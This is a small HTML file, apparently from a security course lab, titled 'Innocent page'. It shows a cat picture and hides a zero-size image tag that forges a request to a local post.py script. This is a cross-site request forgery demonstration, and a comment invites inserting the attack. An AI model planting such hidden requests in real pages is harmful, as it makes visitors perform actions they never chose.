blob: 3e8cdaeb45207d4ccf532e078508b96aaf78cd97 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
<html>
<title> Innocent page </title>
<body>
<h2>This is innocent page, here is a picture of a cute cat: </h2> <br>
<img src="cat.jpg">
<!-- Insert your CSRF attack here. For example you can use another hidden <img> to
generate an HTTP request to post.py to write something from victim -->
<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0">
</body>
</html>
|
